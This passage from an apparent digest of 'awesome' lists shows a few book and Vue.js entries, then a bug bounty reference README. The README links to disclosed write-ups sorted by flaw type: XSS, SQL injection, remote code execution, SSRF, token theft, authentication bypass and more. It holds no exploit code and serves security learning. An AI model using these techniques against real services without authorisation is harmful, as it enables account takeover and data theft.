Name: Prometheus Rising Author: Robert Anton Wilson Goodreads Rating: [4.26](https://www.goodreads.com/book/show/28597.Prometheus_Rising) Year Published: 2010 - Name: Mindset: The new psychology of success Author: Carol S. Dweck,Ph.D. Goodreads Rating: [4.04](https://www.goodreads.com/book/show/40745.Mindset) Year Published: 2006 - Name: Outsmarting IQ: The Emerging Science of Learnable Intelligence Author: David Perkins Goodreads Rating: [4.00](https://www.goodreads.com/book/show/1008488.Outsmarting_Iq) Year Published: 1995 ### Science and Medicine - Name: Gödel, Escher, Bach: An Eternal Golden Braid Author: Douglas R. Hofstadter Goodreads Rating: [4.30](https://www.goodreads.com/book/show/24113.G_del_Escher_Bach) Year Published: 1979 ### Politics - Name: Strangers in Their Own Land: Anger and Mourning on the American Right Author: Arlie Russell Hochschild Goodreads Rating: [4.15](https://www.goodreads.com/book/show/28695425-strangers-in-their-own-land) Year Published: 2016 ### Fiction / Classics - Name: The Director Author: David Ignatius Goodreads Rating: [3.43](http://www.goodreads.com/book/show/23316525-the-director) Year Published: 2015 ### Fiction / Science Fiction - Name: Ready Player One Author: Ernest Cline Goodreads Rating: [4.31](https://www.goodreads.com/book/show/9969571-ready-player-one) Year Published: 2011 - Name: The Fifth Sacred Thing Author: Starhawk Goodreads Rating: [4.25](https://www.goodreads.com/book/show/80689.The_Fifth_Sacred_Thing) Year Published: 1994 - Name: Hyperion Author: Dan Simmons Goodreads Rating: [4.21](https://www.goodreads.com/book/show/77566.Hyperion) Year Published: 1989 - Name: Little Brother Author: Cory Doctorow Goodreads Rating: [3.94](https://www.goodreads.com/book/show/954674.Little_Brother) Year Published: 2008 ## [51. Awesome Vue](/content/vuejs/awesome-vue/week/README.md) ### Resources / Community * [VueJS Thailand - Facebook Group](https://www.facebook.com/groups/VuejsThailand/) * [VueJS Brasil - Telegram Group \[Portuguese\]](https://t.me/vuejsbrasil) * [VueJS Brasil - Facebook Page \[Portuguese\]](https://www.facebook.com/vuejsbrasil/) * [VueJS Brasil - Facebook Group \[Portuguese\]](https://www.facebook.com/groups/vuejsbr/) ### Resources / Tutorials * [Async in VueJS part 1](https://medium.com/js-dojo/async-in-vue-js-part-1-28d96f751a2e) * [Async in VueJS part 2](https://medium.com/js-dojo/async-in-vuejs-part-2-45e81c836e38) ### Projects Using Vue.js / Open Source * [Wiki.js (⭐21k)](https://github.com/Requarks/wiki) - A modern, lightweight and powerful wiki app built on NodeJS, Git and Markdown * [vue-speech-streaming (⭐68)](https://github.com/aofdev/vue-speech-streaming) - A Performing Streaming Speech Recognition results in real time Speech To Text with Google Cloud Speech + socket.io on Progressive Web App * [My Animation List (⭐73)](https://github.com/limichange/my-animation-list) - A tool to easy get css animation code * [vue-input-streaming (⭐25)](https://github.com/aofdev/vue-input-streaming) - A TextInput Streaming RealTime And Two Way Data Binding Broadcasting with Pusher --- - Prev: [Oct 16 - Oct 22, 2017](/content/2017/42/README.md) - Next: [Oct 02 - Oct 08, 2017](/content/2017/40/README.md)
# Bug Bounty Reference A list of bug bounty write-up that is categorized by the bug nature, this is inspired by https://github.com/djadmin/awesome-bug-bounty # Introduction I have been reading for Bug Bounty write-ups for a few months, I found it extremely useful to read relevant write-up when I found a certain type of vulnerability tha I have no idea how to exploit. Let say you found a RPO (Relativce Path Overwrite) in a website, but you have no idea how should you exploit that, then the perfect place to go would be [here](http://blog.innerht.ml/rpo-gadgets/). Or you have found your customer is using oauth mechanism but you have no idea how should we test it, the other perfect place to go would be [here](https://whitton.io/articles/obtaining-tokens-outlook-office-azure-account/) My intention is to make a full and complete list of common vulnerability that are publicly disclosed bug bounty write-up, and let Bug Bounty Hunter to use this page as a reference when they want to gain some insight for a particular kind of vulnerability during Bug Hunting, feel free to submit pull request. Okay, enough for chit-chatting, let's get started. - [XSSI](#xssi) - [Cross-Site Scripting (XSS)](#cross-site-scripting-xss) - [Brute Force](#brute-force) - [SQL Injection (SQLi)](#sql-injection) - [External XML Entity Attack (XXE)](#xxe) - [Remote Code Execution (RCE)](#remote-code-execution) - [Deserialization](#deserialization) - [Image Tragick](#image-tragick) - [Cross-Site Request Forgery (CSRF)](#csrf) - [Insecure Direct Object Reference (IDOR)](#insecure-direct-object-reference-idor) - [Stealing Access Token](#stealing-access-token) - [Google Oauth Login Bypass](#google-oauth-bypass) - [Server Side Request Forgery (SSRF)](#server-side-request-forgery-ssrf) - [Unrestricted File Upload](#unrestricted-file-upload) - [Race Condition](#race-condition) - [Business Logic Flaw](#business-logic-flaw) - [Authentication Bypass](#authentication-bypass) - [HTTP Header Injection](#http-header-injection) - [Email Related](#email-related) - [Money Stealing](#money-stealing) - [Miscellaneous](#miscellaneous) ### Cross-Site Scripting (XSS) - [Sleeping stored Google XSS Awakens a $5000 Bounty](https://blog.it-securityguard.com/bugbounty-sleeping-stored-google-xss-awakens-a-5000-bounty/) by Patrik Fehrenbach - [RPO that lead to information leakage in Google](http://blog.innerht.ml/rpo-gadgets/) by filedescriptor - [God-like XSS, Log-in, Log-out, Log-in](https://whitton.io/articles/uber-turning-self-xss-into-good-xss/) in Uber by Jack Whitton - [Three Stored XSS in Facebook](http://www.breaksec.com/?p=6129) by Nirgoldshlager - [Using a Braun Shaver to Bypass XSS Audit and WAF](https://blog.bugcrowd.com/guest-blog-using-a-braun-shaver-to-bypass-xss-audit-and-waf-by-frans-rosen-detectify) by Frans Rosen - [An XSS on Facebook via PNGs & Wonky Content Types](https://whitton.io/articles/xss-on-facebook-via-png-content-types/) by Jack Whitton - he is able to make stored XSS from a irrelevant domain to main facebook domain - [Stored XSS in *.ebay.com](https://whitton.io/archive/persistent-xss-on-myworld-ebay-com/) by Jack Whitton - [Complicated, Best Report of Google XSS](https://sites.google.com/site/bughunteruniversity/best-reports/account-recovery-xss) by Ramzes - [Tricky Html Injection and Possible XSS in sms-be-vip.twitter.com](https://hackerone.com/reports/150179) by secgeek - [Command Injection in Google Console](http://www.pranav-venkat.com/2016/03/command-injection-which-got-me-6000.html) by Venkat S - [Facebook's Moves - OAuth XSS](http://www.paulosyibelo.com/2015/12/facebooks-moves-oauth-xss.html) by PAULOS YIBELO - [Stored XSS in Google Docs (Bug Bounty)](http://hmgmakarovich.blogspot.hk/2015/11/stored-xss-in-google-docs-bug-bounty.html) by Harry M Gertos - [Stored XSS on developer.uber.com via admin account compromise in Uber](https://hackerone.com/reports/152067) by James Kettle (albinowax) - [Yahoo Mail stored XSS](https://klikki.fi/adv/yahoo.html) by Klikki Oy - [Abusing XSS Filter: One ^ leads to XSS(CVE-2016-3212)](http://mksben.l0.cm/2016/07/xxn-caret.html) by Masato Kinugawa - [Youtube XSS](https://labs.detectify.com/2015/06/06/google-xss-turkey/) by fransrosen - [Best Google XSS again](https://sites.google.com/site/bughunteruniversity/best-reports/openredirectsthatmatter) - by Krzysztof Kotowicz - [IE & Edge URL parsin Problem](https://labs.detectify.com/2016/10/24/combining-host-header-injection-and-lax-host-parsing-serving-malicious-data/) - by detectify - [Google XSS subdomain Clickjacking](http://sasi2103.blogspot.sg/2016/09/combination-of-techniques-lead-to-dom.html) - [Microsoft XSS and Twitter XSS](http://blog.wesecureapp.com/xss-by-tossing-cookies/) - [Google Japan Book XSS](http://nootropic.me/blog/en/blog/2016/09/20/%E3%82%84%E3%81%AF%E3%82%8A%E3%83%8D%E3%83%83%E3%83%88%E3%82%B5%E3%83%BC%E3%83%95%E3%82%A3%E3%83%B3%E3%82%92%E3%81%97%E3%81%A6%E3%81%84%E3%81%9F%E3%82%89%E3%81%9F%E3%81%BE%E3%81%9F%E3%81%BEgoogle/) - [Flash XSS mega nz](https://labs.detectify.com/2013/02/14/how-i-got-the-bug-bounty-for-mega-co-nz-xss/) - by frans - [Flash XSS in multiple libraries](https://olivierbeg.com/finding-xss-vulnerabilities-in-flash-files/) - by Olivier Beg - [xss in google IE, Host Header Reflection](http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html) - [Years ago Google xss](http://conference.hitb.org/hitbsecconf2012ams/materials/D1T2%20-%20Itzhak%20Zuk%20Avraham%20and%20Nir%20Goldshlager%20-%20Killing%20a%20Bug%20Bounty%20Program%20-%20Twice.pdf) - [xss in google by IE weird behavior](http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html) - [xss in Yahoo Fantasy Sport](https://web.archive.org/web/20161228182923/http://dawgyg.com/2016/12/07/stored-xss-affecting-all-fantasy-sports-fantasysports-yahoo-com-2/) - [xss in Yahoo Mail Again, worth $10000](https://klikki.fi/adv/yahoo2.html) by Klikki Oy - [Sleeping XSS in Google](https://blog.it-securityguard.com/bugbounty-sleeping-stored-google-xss-awakens-a-5000-bounty/) by securityguard - [Decoding a .htpasswd to earn a payload of money](https://blog.it-securityguard.com/bugbounty-decoding-a-%F0%9F%98%B1-00000-htpasswd-bounty/) by securityguard - [Google Account Takeover](http://www.orenh.com/2013/11/google-account-recovery-vulnerability.html#comment-form) - [AirBnb Bug Bounty: Turning Self-XSS into Good-XSS #2](http://www.geekboy.ninja/blog/airbnb-bug-bounty-turning-self-xss-into-good-xss-2/) by geekboy - [Uber Self XSS to Global XSS](https://httpsonly.blogspot.hk/2016/08/turning-self-xss-into-good-xss-v2.html) - [How I found a $5,000 Google Maps XSS (by fiddling with Protobuf)](https://medium.com/@marin_m/how-i-found-a-5-000-google-maps-xss-by-fiddling-with-protobuf-963ee0d9caff#.cktt61q9g) by Marin MoulinierFollow - [Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities](https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/) by Brett - [XSSI, Client Side Brute Force](http://blog.intothesymmetry.com/2017/05/cross-origin-brute-forcing-of-saml-and.html) - [postMessage XSS Bypass](https://hackerone.com/reports/231053) - [XSS in Uber via Cookie](http://zhchbin.github.io/2017/08/30/Uber-XSS-via-Cookie/) by zhchbin - [Stealing contact form data on www.hackerone.com using Marketo Forms XSS with postMessage frame-jumping and jQuery-JSONP](https://hackerone.com/reports/207042) by frans - [XSS due to improper regex in third party js Uber 7k XSS](http://zhchbin.github.io/2016/09/10/A-Valuable-XSS/) - [XSS in TinyMCE 2.4.0](https://hackerone.com/reports/262230) by Jelmer de Hen - [Pass uncoded URL in IE11 to cause XSS](https://hackerone.com/reports/150179) - [Twitter XSS by stopping redirection and javascript scheme](http://blog.blackfan.ru/2017/09/devtwittercom-xss.html) by Sergey Bobrov - [Auth DOM Uber XSS](http://stamone-bug-bounty.blogspot.hk/2017/10/dom-xss-auth_14.html) - [Managed Apps and Music: two Google reflected XSSes](https://ysx.me.uk/managed-apps-and-music-a-tale-of-two-xsses-in-google-play/) - [App Maker and Colaboratory: two Google stored XSSes](https://ysx.me.uk/app-maker-and-colaboratory-a-stored-google-xss-double-bill/) - [XSS in www.yahoo.com](https://www.youtube.com/watch?v=d9UEVv3cJ0Q&feature=youtu.be) - [Stored XSS, and SSRF in Google using the Dataset Publishing Language](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html) - [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd) ### Brute Force - [Web Authentication Endpoint Credentials Brute-Force Vulnerability](https://hackerone.com/reports/127844) by Arne Swinnen - [InstaBrute: Two Ways to Brute-force Instagram Account Credentials](https://www.arneswinnen.net/2016/05/instabrute-two-ways-to-brute-force-instagram-account-credentials/) by Arne Swinnen - [How I Could Compromise 4% (Locked) Instagram Accounts](https://www.arneswinnen.net/2016/03/how-i-could-compromise-4-locked-instagram-accounts/) by Arne Swinnen - [Possibility to brute force invite codes in riders.uber.com](https://hackerone.com/reports/125505) by r0t - [Brute-Forcing invite codes in partners.uber.com](https://hackerone.com/reports/144616) by Efkan Gökbaş (mefkan) - [How I could have hacked all Facebook accounts](http://www.anandpraka.sh/2016/03/how-i-could-have-hacked-your-facebook.html) by Anand Prakash - [Facebook Account Take Over by using SMS verification code, not accessible by now, may get update from author later](http://arunsureshkumar.me/index.php/2016/04/24/facebook-account-take-over/) by Arun Sureshkumar ### SQL Injection - [SQL injection in Wordpress Plugin Huge IT Video Gallery in Uber](https://hackerone.com/reports/125932) by glc - [SQL Injection on sctrack.email.uber.com.cn](https://hackerone.com/reports/150156) by Orange Tsai - [Yahoo – Root Access SQL Injection – tw.yahoo.com](http://buer.haus/2015/01/15/yahoo-root-access-sql-injection-tw-yahoo-com/) by Brett Buerhaus - [Multiple vulnerabilities in a WordPress plugin at drive.uber.com](https://hackerone.com/reports/135288) by Abood Nour (syndr0me) - [GitHub Enterprise SQL Injection](http://blog.orange.tw/2017/01/bug-bounty-github-enterprise-sql-injection.html) by Orange - [Yahoo SQL Injection to Remote Code Exection to Root Privilege](http://www.sec-down.com/wordpress/?p=494) by Ebrahim Hegazy ### Stealing Access Token - [Facebook Access Token Stolen](https://whitton.io/articles/stealing-facebook-access-tokens-with-a-double-submit/) by Jack Whitton - - [Obtaining Login Tokens for an Outlook, Office or Azure Account](https://whitton.io/articles/obtaining-tokens-outlook-office-azure-account/) by Jack Whitton - [Bypassing Digits web authentication's host validation with HPP](https://hackerone.com/reports/114169) by filedescriptor - [Bypass of redirect_uri validation with /../ in GitHub](http://homakov.blogspot.hk/2014/02/how-i-hacked-github-again.html?m=1) by Egor Homakov - [Bypassing callback_url validation on Digits](https://hackerone.com/reports/108113) by filedescriptor - [Stealing livechat token and using it to chat as the user - user information disclosure](https://hackerone.com/reports/151058) by Mahmoud G. (zombiehelp54) - [Change any Uber user's password through /rt/users/passwordless-signup - Account Takeover (critical)](https://hackerone.com/reports/143717) by mongo (mongo) - [Internet Explorer has a URL problem, on GitHub](http://blog.innerht.ml/internet-explorer-has-a-url-problem/) by filedescriptor. - [How I made LastPass give me all your passwords](https://labs.detectify.com/2016/07/27/how-i-made-lastpass-give-me-all-your-passwords/) by labsdetectify - [Steal Google Oauth in Microsoft](http://blog.intothesymmetry.com/2015/06/on-oauth-token-hijacks-for-fun-and.html) - [Steal FB Access Token](http://blog.intothesymmetry.com/2014/04/oauth-2-how-i-have-hacked-facebook.html) - [Paypal Access Token Leaked](http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html?m=1) - [Steal FB Access Token](http://homakov.blogspot.sg/2013/02/hacking-facebook-with-oauth2-and-chrome.html) - [Appengine Cool Bug](https://proximasec.blogspot.hk/2017/02/a-tale-about-appengines-authentication.html) - [Slack post message real life experience](https://labs.detectify.com/2017/02/28/hacking-slack-using-postmessage-and-websocket-reconnect-to-steal-your-precious-token/) - [Bypass redirect_uri](http://nbsriharsha.blogspot.in/2016/04/oauth-20-redirection-bypass-cheat-sheet.html) by nbsriharsha - [Stealing Facebook Messenger nonce worth 15k](https://stephensclafani.com/2017/03/21/stealing-messenger-com-login-nonces/) - [Steal Oculus Nonce and Oauth Flow Bypass](https://medium.com/@lokeshdlk77/bypass-oauth-nonce-and-steal-oculus-response-code-faa9cc8d0d37) #### Google oauth bypass - [Bypassing Google Authentication on Periscope's Administration Panel](https://whitton.io/articles/bypassing-google-authentication-on-periscopes-admin-panel/) By Jack Whitton ### CSRF - [Messenger.com CSRF that show you the steps when you check for CSRF](https://whitton.io/articles/messenger-site-wide-csrf/) by Jack Whitton - [Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack)](https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-picture-without-consent-csrf-attack/) by Florian Courtial - [Hacking PayPal Accounts with one click (Patched)](http://yasserali.com/hacking-paypal-accounts-with-one-click/) by Yasser Ali - [Add tweet to collection CSRF](https://hackerone.com/reports/100820) by vijay kumar - [Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun](http://philippeharewood.com/facebookmarketingdevelopers-com-proxies-csrf-quandry-and-api-fun/) by phwd - [How i Hacked your Beats account ? Apple Bug Bounty](https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/) by @aaditya_purani - [FORM POST JSON: JSON CSRF on POST Heartbeats API](https://hackerone.com/reports/245346) by Dr.Jones - [Hacking Facebook accounts using CSRF in Oculus-Facebook integration](https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf) ### Remote Code Execution - [JDWP Remote Code Execution in PayPal](https://www.vulnerability-lab.com/get_content.php?id=1474) by Milan A Solanki - [XXE in OpenID: one bug to rule them all, or how I found a Remote Code Execution flaw affecting Facebook's servers](http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution) by Reginaldo Silva - [How I Hacked Facebook, and Found Someone's Backdoor Script](http://devco.re/blog/2016/04/21/how-I-hacked-facebook-and-found-someones-backdoor-script-eng-ver/) by Orange Tsai - [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html) by Orange Tsai - [uber.com may RCE by Flask Jinja2 Template Injection](https://hackerone.com/reports/125980) by Orange Tsai - [Yahoo Bug Bounty - *.login.yahoo.com Remote Code Execution](http://blog.orange.tw/2013/11/yahoo-bug-bounty-part-2-loginyahoocom.html) by Orange Tsai (Sorry its in Chinese Only) - [How we broke PHP, hacked Pornhub and earned $20,000](https://www.evonide.com/how-we-broke-php-hacked-pornhub-and-earned-20000-dollar/) by Ruslan Habalov - *Alert*, God-like Write-up, make sure you know what is ROP before clicking, which I don't =( - [RCE deal to tricky file upload](https://www.secgeek.net/bookfresh-vulnerability/) by secgeek - [WordPress SOME bug in plupload.flash.swf leading to RCE in Automatic](https://hackerone.com/reports/134738) by Cure53 (cure53) - [Read-Only user can execute arbitraty shell commands on AirOS](https://hackerone.com/reports/128750) by 93c08539 (93c08539) - [Remote Code Execution by impage upload!](https://hackerone.com/reports/158148) by Raz0r (ru_raz0r) - [Popping a shell on the Oculus developer portal](https://bitquark.co.uk/blog/2014/08/31/popping_a_shell_on_the_oculus_developer_portal) by Bitquark - [Crazy! PornHub RCE AGAIN!!! How I hacked Pornhub for fun and profit - 10,000$](https://5haked.blogspot.sg/) by 5haked - [PayPal Node.js code injection (RCE)](http://artsploit.blogspot.hk/2016/08/pprce2.html) by Michael Stepankin - [eBay PHP Parameter Injection lead to RCE](http://secalert.net/#ebay-rce-ccs) - [Yahoo Acqusition RCE](https://seanmelia.files.wordpress.com/2016/02/yahoo-remote-code-execution-cms1.pdf) - [Command Injection Vulnerability in Hostinger](http://elladodelnovato.blogspot.hk/2017/02/command-injection-vulnerability-in.html?spref=tw&m=1) by @alberto__segura - [RCE in Airbnb by Ruby Injection](http://buer.haus/2017/03/13/airbnb-ruby-on-rails-string-interpolation-led-to-remote-code-execution/) by buerRCE - [RCE in Imgur by Command Line](https://hackerone.com/reports/212696) - [RCE in git.imgur.com by abusing out dated software](https://hackerone.com/reports/206227) by Orange Tsai - [RCE in Disclosure](https://hackerone.com/reports/213558) - [Remote Code Execution by struct2 Yahoo Server](https://medium.com/@th3g3nt3l/how-i-got-5500-from-yahoo-for-rce-92fffb7145e6) - [Command Injection in Yahoo Acquisition](http://samcurry.net/how-i-couldve-taken-over-the-production-server-of-a-yahoo-acquisition-through-command-injection/) - [Paypal RCE](http://blog.pentestbegins.com/2017/07/21/hacking-into-paypal-server-remote-code-execution-2017/) - [$50k RCE in JetBrains IDE](http://blog.saynotolinux.com/blog/2016/08/15/jetbrains-ide-remote-code-execution-and-local-file-disclosure-vulnerability-analysis/) - [$20k RCE in Jenkin Instance](http://nahamsec.com/secure-your-jenkins-instance-or-hackers-will-force-you-to/) by @nahamsec - [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/) - [Telekom.de Remote Command Execution!](http://www.sec-down.com/wordpress/?p=581) by Ebrahim Hegazy - [Magento Remote Code Execution Vulnerability!](http://www.sec-down.com/wordpress/?p=578) by Ebrahim Hegazy - [Yahoo! Remote Command Execution Vulnerability](http://www.sec-down.com/wordpress/?p=87) by Ebrahim Hegazy #### Deserialization - [Java Deserialization in manager.paypal.com](http://artsploit.blogspot.hk/2016/01/paypal-rce.html) by Michael Stepankin - [Instagram's Million Dollar Bug](http://www.exfiltrated.com/research-Instagram-RCE.php) by Wesley Wineberg - [(Ruby Cookie Deserialization RCE on facebooksearch.algolia.com](https://hackerone.com/reports/134321) by Michiel Prins (michiel) - [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals #### Image Tragick - [Exploiting ImageMagick to get RCE on Polyvore (Yahoo Acquisition)](http://nahamsec.com/exploiting-imagemagick-on-yahoo/) by NaHamSec - [Exploting ImageMagick to get RCE on HackerOne](https://hackerone.com/reports/135072) by c666a323be94d57 - [Trello bug bounty: Access server's files using ImageTragick](https://hethical.io/trello-bug-bounty-access-servers-files-using-imagetragick/) by Florian Courtial - [40k fb rce](4lemon.ru/2017-01-17_facebook_imagetragick_remote_code_execution.html) - [Yahoo Bleed 1](https://scarybeastsecurity.blogspot.hk/2017/05/bleed-continues-18-byte-file-14k-bounty.html) - [Yahoo Bleed 2](https://scarybeastsecurity.blogspot.hk/2017/05/bleed-more-powerful-dumping-yahoo.html) ### Direct Object Reference (IDOR) - [Trello bug bounty: The websocket receives data when a public company creates a team visible board](https://hethical.io/trello-bug-bounty-the-websocket-receives-data-when-a-public-company-creates-a-team-visible-board/) by Florian Courtial - [Trello bug bounty: Payments informations are sent to the webhook when a team changes its visibility](https://hethical.io/trello-bug-bounty-payments-informations-are-sent-to-the-webhook-when-a-team-changes-its-visibility/) by Florian Courtial - [Change any user's password in Uber](https://hackerone.com/reports/143717) by mongo - [Vulnerability in Youtube allowed moving comments from any video to another](https://www.secgeek.net/youtube-vulnerability/) by secgeek - It's *Google* Vulnerability, so it's worth reading, as generally it is more difficult to find Google vulnerability - [Twitter Vulnerability Could Credit Cards from Any Twitter Account](https://www.secgeek.net/twitter-vulnerability/) by secgeek - [One Vulnerability allowed deleting comments of any user in all Yahoo sites](https://www.secgeek.net/yahoo-comments-vulnerability/) by secgeek - [Microsoft-careers.com Remote Password Reset](http://yasserali.com/microsoft-careers-com-remote-password-reset/) by Yaaser Ali - [How I could change your eBay password](http://yasserali.com/how-i-could-change-your-ebay-password/) by Yaaser Ali - [Duo Security Researchers Uncover Bypass of PayPal’s Two-Factor Authentication](https://duo.com/blog/duo-security-researchers-uncover-bypass-of-paypal-s-two-factor-authentication) by Duo Labs - [Hacking Facebook.com/thanks Posting on behalf of your friends! ](http://www.anandpraka.sh/2014/11/hacking-facebookcomthanks-posting-on.html) by Anand Prakash - [How I got access to millions of [redacted] accounts](https://bitquark.co.uk/blog/2016/02/09/how_i_got_access_to_millions_of_redacted_accounts) - [All Vimeo Private videos disclosure via Authorization Bypass with Excellent Technical Description](https://hackerone.com/reports/137502) by Enguerran Gillier (opnsec) - [Urgent: attacker can access every data source on Bime](https://hackerone.com/reports/149907) by Jobert Abma (jobert) - [Downloading password protected / restricted videos on Vimeo](https://hackerone.com/reports/145467) by Gazza (gazza) - [Get organization info base on uuid in Uber](https://hackerone.com/reports/151465) by Severus (severus) - [How I Exposed your Primary Facebook Email Address (Bug worth $4500)](http://roy-castillo.blogspot.hk/2013/07/how-i-exposed-your-primary-facebook.html) by Roy Castillo - [DOB disclosed using “Facebook Graph API Reverse Engineering”](https://medium.com/@rajsek/my-3rd-facebook-bounty-hat-trick-chennai-tcs-er-name-listed-in-facebook-hall-of-fame-47f57f2a4f71#.9gbtbv42q) by Raja Sekar Durairaj - [Change the description of a video without publish_actions permission in Facebook](http://philippeharewood.com/change-the-description-of-a-video-without-publish_actions-permission/) by phwd - [Response To Request Injection (RTRI)](https://www.bugbountyhq.com/front/latestnews/dWRWR0thQ2ZWOFN5cTE1cXQrSFZmUT09/) by ?, be honest, thanks to this article, I have found quite a few bugs because of using his method, respect to the author! - [Leak of all project names and all user names , even across applications on Harvest](https://hackerone.com/reports/152696) by Edgar Boda-Majer (eboda) - [Changing paymentProfileUuid when booking a trip allows free rides at Uber](https://hackerone.com/reports/162809) by Matthew Temmy (temmyscript) - [View private tweet](https://hackerone.com/reports/174721) - [Uber Enum UUID](http://www.rohk.xyz/uber-uuid/) - [Hacking Facebook’s Legacy API, Part 1: Making Calls on Behalf of Any User](http://stephensclafani.com/2014/07/08/hacking-facebooks-legacy-api-part-1-making-calls-on-behalf-of-any-user/) by Stephen Sclafani - [Hacking Facebook’s Legacy API, Part 2: Stealing User Sessions](http://stephensclafani.com/2014/07/29/hacking-facebooks-legacy-api-part-2-stealing-user-sessions/) by Stephen Sclafani - [Delete FB Video](https://danmelamed.blogspot.hk/2017/01/facebook-vulnerability-delete-any-video.html) - [Delete FB Video](https://pranavhivarekar.in/2016/06/23/facebooks-bug-delete-any-video-from-facebook/) - [Facebook Page Takeover by Manipulating the Parameter](http://arunsureshkumar.me/index.php/2016/09/16/facebook-page-takeover-zero-day-vulnerability/) by arunsureshkumar - [Viewing private Airbnb Messages](http://buer.haus/2017/03/31/airbnb-web-to-app-phone-notification-idor-to-view-everyones-airbnb-messages/) - [IDOR tweet as any user](http://kedrisec.com/twitter-publish-by-any-user/) by kedrisec - [Classic IDOR endpoints in Twitter](http://www.anandpraka.sh/2017/05/how-i-took-control-of-your-twitter.html) - [Mass Assignment, Response to Request Injection, Admin Escalation](https://seanmelia.wordpress.com/2017/06/01/privilege-escalation-in-a-django-application/) by sean - [Getting any Facebook user's friend list and partial payment card details](https://www.josipfranjkovic.com/blog/facebook-friendlist-paymentcard-leak) ### XXE - [How we got read access on Google’s production servers](https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/) by detectify - [Blind OOB XXE At UBER 26+ Domains Hacked](http://nerdint.blogspot.hk/2016/08/blind-oob-xxe-at-uber-26-domains-hacked.html) by Raghav Bisht - [XXE through SAML](https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf) - [XXE in Uber to read local files](https://httpsonly.blogspot.hk/2017/01/0day-writeup-xxe-in-ubercom.html) - [XXE by SVG in community.lithium.com](http://esoln.net/Research/2017/03/30/xxe-in-lithium-community-platform/) ### Unrestricted File Upload - [File Upload XSS in image uploading of App in mopub](https://hackerone.com/reports/97672) by vijay kumar - [RCE deal to tricky file upload](https://www.secgeek.net/bookfresh-vulnerability/) by secgeek - [File Upload XSS in image uploading of App in mopub in Twitter](https://hackerone.com/reports/97672) by vijay kumar (vijay_kumar1110) ### Server Side Request Forgery (SSRF) - [ESEA Server-Side Request Forgery and Querying AWS Meta Data](http://buer.haus/2016/04/18/esea-server-side-request-forgery-and-querying-aws-meta-data/) by Brett Buerhaus - [SSRF to pivot internal network](https://seanmelia.files.wordpress.com/2016/07/ssrf-to-pivot-internal-networks.pdf) - [SSRF to LFI](https://seanmelia.wordpress.com/2015/12/23/various-server-side-request-forgery-issues/) - [SSRF to query google internal server](https://www.rcesecurity.com/2017/03/ok-google-give-me-all-your-internal-dns-information/) - [SSRF by using third party Open redirect](https://buer.haus/2017/03/09/airbnb-chaining-third-party-open-redirect-into-server-side-request-forgery-ssrf-via-liveperson-chat/) by Brett BUERHAUS - [SSRF tips from BugBountyHQ of Images](https://twitter.com/BugBountyHQ/status/868242771617792000) - [SSRF to RCE](http://www.kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF-to-RCE-with-Hashicorp-Consul.html) - [XXE at Twitter](https://hackerone.com/reports/248668) - [Blog post: Cracking the Lens: Targeting HTTP’s Hidden Attack-Surface ](http://blog.portswigger.net/2017/07/cracking-lens-targeting-https-hidden.html) - [Plotly AWS Metadata SSRF (and a stored XSS)](https://ysx.me.uk/a-pair-of-plotly-bugs-stored-xss-and-aws-metadata-ssrf/) ### Race Condition - [Race conditions on Facebook, DigitalOcean and others (fixed)](http://josipfranjkovic.blogspot.hk/2015/04/race-conditions-on-facebook.html) by Josip Franjković - [Race Conditions in Popular reports feature in HackerOne](https://hackerone.com/reports/146845) by Fábio Pires (shmoo) - [Hacking Starbuck for unlimited money](https://sakurity.com/blog/2015/05/21/starbucks.html) by Egor Homakov ### Business Logic Flaw - [How I Could Steal Money from Instagram, Google and Microsoft](https://www.arneswinnen.net/2016/07/how-i-could-steal-money-from-instagram-google-and-microsoft/) by Arne Swinnen - [How I could have removed all your Facebook notes](http://www.anandpraka.sh/2015/12/summary-this-blog-post-is-about.html) - [Facebook - bypass ads account's roles vulnerability 2015](http://blog.darabi.me/2015/03/facebook-bypass-ads-account-roles.html) by POUYA DARABI - [Uber Ride for Free](http://www.anandpraka.sh/2017/03/how-anyone-could-have-used-uber-to-ride.html) by anand praka - [Uber Eat for Free](https://t.co/MCOM7j2dWX) by ### Authentication Bypass - [OneLogin authentication bypass on WordPress sites via XMLRPC in Uber](https://hackerone.com/reports/138869) by Jouko Pynnönen (jouko) - [2FA PayPal Bypass](https://henryhoggard.co.uk/blog/Paypal-2FA-Bypass) by henryhoggard - [SAML Bug in Github worth 15000](http://www.economyofmechanism.com/github-saml.html) - [Authentication bypass on Airbnb via OAuth tokens theft](https://www.arneswinnen.net/2017/06/authentication-bypass-on-airbnb-via-oauth-tokens-theft/) - [Uber Login CSRF + Open Redirect -> Account Takeover at Uber](http://ngailong.com/uber-login-csrf-open-redirect-account-takeover/) - [Administrative Panel Access](http://c0rni3sm.blogspot.hk/2017/08/accidentally-typo-to-bypass.html?m=1) by c0rni3sm - [Uber Bug Bounty: Gaining Access To An Internal Chat System](http://blog.mish.re/index.php/2017/09/06/uber-bug-bounty-gaining-access-to-an-internal-chat-system/) by mishre - [Flickr Oauth Misconfiguration](https://mishresec.wordpress.com/2017/10/12/yahoo-bug-bounty-exploiting-oauth-misconfiguration-to-takeover-flickr-accounts/) by 